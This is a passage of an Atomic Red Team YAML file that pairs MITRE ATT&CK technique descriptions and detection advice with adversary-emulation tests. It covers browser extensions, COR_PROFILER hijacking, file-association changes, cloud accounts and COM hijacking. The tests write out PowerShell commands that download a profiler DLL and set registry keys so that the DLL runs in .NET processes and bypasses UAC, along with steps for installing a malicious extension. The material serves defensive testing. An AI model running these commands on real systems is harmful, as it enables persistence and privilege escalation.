difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates. - - Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation. - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process use of network - - Process monitoring - - Browser extensions - x_mitre_contributors: - - Justin Warner, ICEBRG - x_mitre_version: '1.1' - identifier: T1176 - atomic_tests: - - name: Chrome (Developer Mode) - auto_generated_guid: 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 - description: Turn on Chrome developer mode and Load Extension found in the src - directory - supported_platforms: - - linux - - windows - - macos - executor: - steps: | - 1. Navigate to [chrome://extensions](chrome://extensions) and - tick 'Developer Mode'. - - 2. Click 'Load unpacked extension...' and navigate to - [Browser_Extension](../t1176/src/) - - 3. Click 'Select' - name: manual - - name: Chrome (Chrome Web Store) - auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f - description: Install the "Minimum Viable Malicious Extension" Chrome extension - supported_platforms: - - linux - - windows - - macos - executor: - steps: | - 1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend - in Chrome - - 2. Click 'Add to Chrome' - name: manual - - name: Firefox - auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 - description: 'Create a file called test.wma, with the duration of 30 seconds - -' - supported_platforms: - - linux - - windows - - macos - executor: - steps: | - 1. Navigate to [about:debugging](about:debugging) and - click "Load Temporary Add-on" - - 2. Navigate to [manifest.json](./src/manifest.json) - - 3. Then click 'Open' - name: manual - - name: Edge Chromium Addon - VPN - auto_generated_guid: 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 - description: 'Adversaries may use VPN extensions in an attempt to hide traffic - sent from a compromised host. This will install one (of many) available VPNS - in the Edge add-on store. - -' - supported_platforms: - - windows - - macos - executor: - steps: | - 1. Navigate to https://microsoftedge.microsoft.com/addons/detail/fjnehcbecaggobjholekjijaaekbnlgj - in Edge Chromium - - 2. Click 'Get' - name: manual - T1574.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.012 - url: https://attack.mitre.org/techniques/T1574/012 - - source_name: Microsoft Profiling Mar 2017 - url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview - description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June - 24, 2020. - - source_name: Microsoft COR_PROFILER Feb 2013 - url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100) - description: Microsoft. (2013, February 4). Registry-Free Profiler Startup - and Attach. Retrieved June 24, 2020. - - source_name: RedCanary Mockingbird May 2020 - url: https://redcanary.com/blog/blue-mockingbird-cryptominer/ - description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved - May 26, 2020. - - source_name: Red Canary COR_PROFILER May 2020 - url: https://redcanary.com/blog/cor_profiler-for-persistence/ - description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation - for persistence. Retrieved June 24, 2020. - - source_name: Almond COR_PROFILER Apr 2019 - url: https://offsec.almond.consulting/UAC-bypass-dotnet.html - description: Almond. (2019, April 30). UAC bypass via elevated .NET applications. - Retrieved June 24, 2020. - - source_name: GitHub OmerYa Invisi-Shell - url: https://github.com/OmerYa/Invisi-Shell - description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, - 2020. - - source_name: subTee .NET Profilers May 2017 - url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html - description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET - Profilers. Retrieved June 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: COR_PROFILER - description: |- - Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) - - The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) - - Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) - id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-26T16:09:58.920Z' - created: '2020-06-24T22:30:55.843Z' - x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER, - monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and - COR_PROFILER_PATH that correspond to system and user environment variables - that do not correlate to known developer tools. Extra scrutiny should be placed - on suspicious modification of these Registry keys by command line tools like - wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring - for command-line arguments indicating a change to COR_PROFILER variables may - aid in detection. For system, user, and process scope abuse of the COR_PROFILER, - monitor for new suspicious unmanaged profiling DLLs loading into .NET processes - shortly after the CLR causing abnormal process behavior.(Citation: Red Canary - COR_PROFILER May 2020) Consider monitoring for DLL files that are associated - with COR_PROFILER environment variables.' - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_contributors: - - Jesse Brown, Red Canary - x_mitre_platforms: - - Windows - identifier: T1574.012 - atomic_tests: - - name: User scope COR_PROFILER - auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a - description: | - Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). - The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. - Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. - If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, - the notepad process will not execute with high integrity. - - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan - New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - Write-Host "executing eventvwr.msc" -ForegroundColor Cyan - START MMC.EXE EVENTVWR.MSC - cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" - -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment - -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty - -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore - | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" - -Force -ErrorAction Ignore | Out-Null\n" - name: powershell - - name: System Scope COR_PROFILER - auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 - description: | - Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. - The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity - level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will - still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. - - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating system environment variables" -ForegroundColor Cyan - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - cleanup_command: | - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null - name: powershell - elevation_required: true - - name: Registry-free process scope COR_PROFILER - auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 - description: | - Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. - - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unamanged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - $env:COR_ENABLE_PROFILING = 1 - $env:COR_PROFILER = '#{clsid_guid}' - $env:COR_PROFILER_PATH = '#{file_name}' - POWERSHELL -c 'Start-Sleep 1' - cleanup_command: | - $env:COR_ENABLE_PROFILING = 0 - $env:COR_PROFILER = '' - $env:COR_PROFILER_PATH = '' - name: powershell - T1546.001: - technique: - created: '2020-01-24T13:40:47.282Z' - modified: '2020-01-24T13:40:47.282Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c - description: "Adversaries may establish persistence by executing malicious content - triggered by a file type association. When a file is opened, the default program - used to open the file (also called the file association or handler) is checked. - File association selections are stored in the Windows Registry and can be - edited by users, administrators, or programs that have Registry access (Citation: - Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or - by administrators using the built-in assoc utility. (Citation: Microsoft Assoc - Oct 2017) Applications can modify the file association for a given file extension - to call an arbitrary program when a file with the given extension is opened.\n\nSystem - file associations are listed under HKEY_CLASSES_ROOT\\.[extension], - for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler - for that extension located at HKEY_CLASSES_ROOT\\[handler]. The - various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. - For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* - HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe - values of the keys listed are commands that are executed when the handler - opens the file extension. Adversaries can modify these values to continually - execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)" - name: Change Default File Association - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1546.001 - url: https://attack.mitre.org/techniques/T1546/001 - - external_id: CAPEC-556 - source_name: capec - url: https://capec.mitre.org/data/definitions/556.html - - url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs - description: Microsoft. (n.d.). Change which programs Windows 7 uses by default. - Retrieved July 26, 2016. - source_name: Microsoft Change Default Programs - - url: http://msdn.microsoft.com/en-us/library/bb166549.aspx - description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. - Retrieved November 13, 2014. - source_name: Microsoft File Handlers - - url: https://docs.microsoft.com/windows-server/administration/windows-commands/assoc - description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August - 7, 2018. - source_name: Microsoft Assoc Oct 2017 - - url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd - description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August - 8, 2018. - source_name: TrendMicro TROJ-FAKEAV OCT 2012 - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - x_mitre_detection: |- - Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. - - User file association preferences are stored under [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys. - - Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1546.001 - atomic_tests: - - name: Change Default File Association - auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 - description: "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon - successful execution, cmd.exe will change the file association of .hta to - notepad.exe. \n" - supported_platforms: - - windows - input_arguments: - target_extension_handler: - description: txtfile maps to notepad.exe - type: Path - default: txtfile - extension_to_change: - description: File Extension To Hijack - type: String - default: ".hta" - original_extension_handler: - description: File Extension To Revert - type: String - default: htafile - executor: - command: 'assoc #{extension_to_change}=#{target_extension_handler} - -' - cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - -' - name: command_prompt - elevation_required: true - T1136.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1136.003 - url: https://attack.mitre.org/techniques/T1136/003 - - source_name: Microsoft O365 Admin Roles - url: https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide - description: Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. - al.. (2019, October 8). About admin roles. Retrieved October 18, 2019. - - source_name: Microsoft Support O365 Add Another Admin, October 2019 - url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d - description: Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. - - source_name: AWS Create IAM User - url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html - description: AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved - January 29, 2020. - - source_name: GCP Create Cloud Identity Users - url: https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554 - description: Google. (n.d.). Create Cloud Identity user accounts. Retrieved - January 29, 2020. - - source_name: Microsoft Azure AD Users - url: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory - description: Microsoft. (2019, November 11). Add or delete users using Azure - Active Directory. Retrieved January 30, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Cloud Account - description: |- - Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) - - Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. - id: attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T12:44:27.995Z' - created: '2020-01-29T17:32:30.711Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: Collect usage logs from cloud user and administrator accounts - to identify unusual activity in the creation of new accounts and assignment - of roles to those accounts. Monitor for accounts assigned to admin roles that - go over a certain threshold of known admins. - x_mitre_data_sources: - - Office 365 audit logs - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - x_mitre_contributors: - - Praetorian - - Microsoft Threat Intelligence Center (MSTIC) - x_mitre_platforms: - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - atomic_tests: [] - T1078.004: - technique: - id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 - description: |- - Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) - - Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. - name: Cloud Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1078.004 - url: https://attack.mitre.org/techniques/T1078/004 - - source_name: AWS Identity Federation - url: https://aws.amazon.com/identity/federation/ - description: Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, - 2020. - - source_name: Google Federating GC - url: https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction - description: Google. (n.d.). Federating Google Cloud with Active Directory. - Retrieved March 13, 2020. - - source_name: Microsoft Deploying AD Federation - url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs - description: Microsoft. (n.d.). Deploying Active Directory Federation Services - in Azure. Retrieved March 13, 2020. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-10-19T16:01:22.090Z' - created: '2020-03-13T20:36:57.378Z' - x_mitre_platforms: - - AWS - - GCP - - Azure - - SaaS - - Azure AD - - Office 365 - x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs - x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal - or malicious behavior, such as accessing information outside of the normal - function of the account or account usage at atypical hours. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - atomic_tests: [] - T1542.002: - technique: - created: '2019-12-19T20:21:21.669Z' - modified: '2020-03-23T23:48:33.904Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4 - description: |- - Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking. - - Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks. - name: Component Firmware - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1542.002 - url: https://attack.mitre.org/techniques/T1542/002 - - description: SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology - (S.M.A.R.T.). Retrieved October 2, 2018. - source_name: SanDisk SMART - - url: https://www.smartmontools.org/ - description: smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018. - source_name: SmartMontools - - url: https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html - description: Pinola, M. (2014, December 14). 3 tools to check your hard drive's - health and make sure it's not already dying on you. Retrieved October 2, - 2018. - source_name: ITWorld Hard Disk Health Dec 2014 - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - Component firmware - - Process monitoring - - Disk forensics - - API monitoring - x_mitre_detection: |- - Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. - - Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images. - x_mitre_defense_bypassed: - - Anti-virus - - Host intrusion prevention systems - - File monitoring - x_mitre_permissions_required: - - SYSTEM - x_mitre_system_requirements: - - Ability to update component device firmware from the host operating system. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1546.015: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.015 - url: https://attack.mitre.org/techniques/T1546/015 - - url: https://msdn.microsoft.com/library/ms694363.aspx - description: Microsoft. (n.d.). The Component Object Model. Retrieved August - 18, 2016. - source_name: Microsoft Component Object Model - - url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence - description: 'G DATA. (2014, October). COM Object hijacking: the discreet - way of persistence. Retrieved August 13, 2016.' - source_name: GDATA COM Hijacking - - source_name: Endgame COM Hijacking - description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting - Persistence & Evasion with the COM. Retrieved September 15, 2016.' - url: https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Component Object Model Hijacking - description: "Adversaries may establish persistence by executing malicious content - triggered by hijacked references to Component Object Model (COM) objects. - COM is a system within Windows to enable interaction between software components - through the operating system.(Citation: Microsoft Component Object Model) - \ References to various COM objects are stored in the Registry. \n\nAdversaries - can use the COM system to insert malicious code that can be executed in place - of legitimate software through hijacking the COM references and relationships - as a means for persistence. Hijacking a COM object requires a change in the - Registry to replace a reference to a legitimate system component which may - cause that component to not work when executed. When that system component - is executed through normal system operation the adversary's code will be executed - instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects - that are used frequently enough to maintain a consistent level of persistence, - but are unlikely to break noticeable functionality within the system as to - avoid system instability that could lead to detection. " - id: attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-07-09T13:55:51.172Z' - created: '2020-03-16T14:12:47.923Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: "There are opportunities to detect COM hijacking by searching - for Registry references that have been replaced and through Registry operations - (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary - paths with unknown paths or otherwise malicious content. Even though some - third-party applications define user COM objects, the presence of objects - within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and - should be investigated since user objects will be loaded prior to machine - objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Endgame - COM Hijacking) Registry entries for existing COM objects may change infrequently. - When an entry with a known good path and binary is replaced or changed to - an unusual value to point to an unknown binary in a new location, then it - may indicate suspicious behavior and should be investigated. \n\nLikewise, - if software DLL loads are collected and analyzed, any unusual DLL load that - can be correlated with a COM object Registry modification may indicate COM - hijacking has been performed. " - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Windows Registry - x_mitre_contributors: - - Elastic - x_mitre_platforms: - - Windows - atomic_tests: [] - T1554: - technique: - id: attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5 - description: |- - Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. - - Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host. - name: Compromise Client Software Binary - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1554 - url: https://attack.mitre.org/techniques/T1554 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-27T14:49:58.249Z' - created: '2020-02-11T18:18:34.279Z' - x_mitre_contributors: - - CrowdStrike Falcon OverWatch - x_mitre_data_sources: - - Process monitoring - - Binary file metadata - x_mitre_detection: "Collect and analyze signing certificate metadata and check - signature validity on software that executes within the environment. Look - for changes to client software that do not correlate with known software or - patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, - such as atypical module loads, file reads/writes, or network connections." - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - atomic_tests: [] - T1136: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1136 - url: https://attack.mitre.org/techniques/T1136 - - source_name: Microsoft User Creation Event - description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account - was created. Retrieved June 30, 2017.' - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 - description: |- - Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. - - Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection. - name: Create Account - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67 - type: attack-pattern - kill_chain_phases: 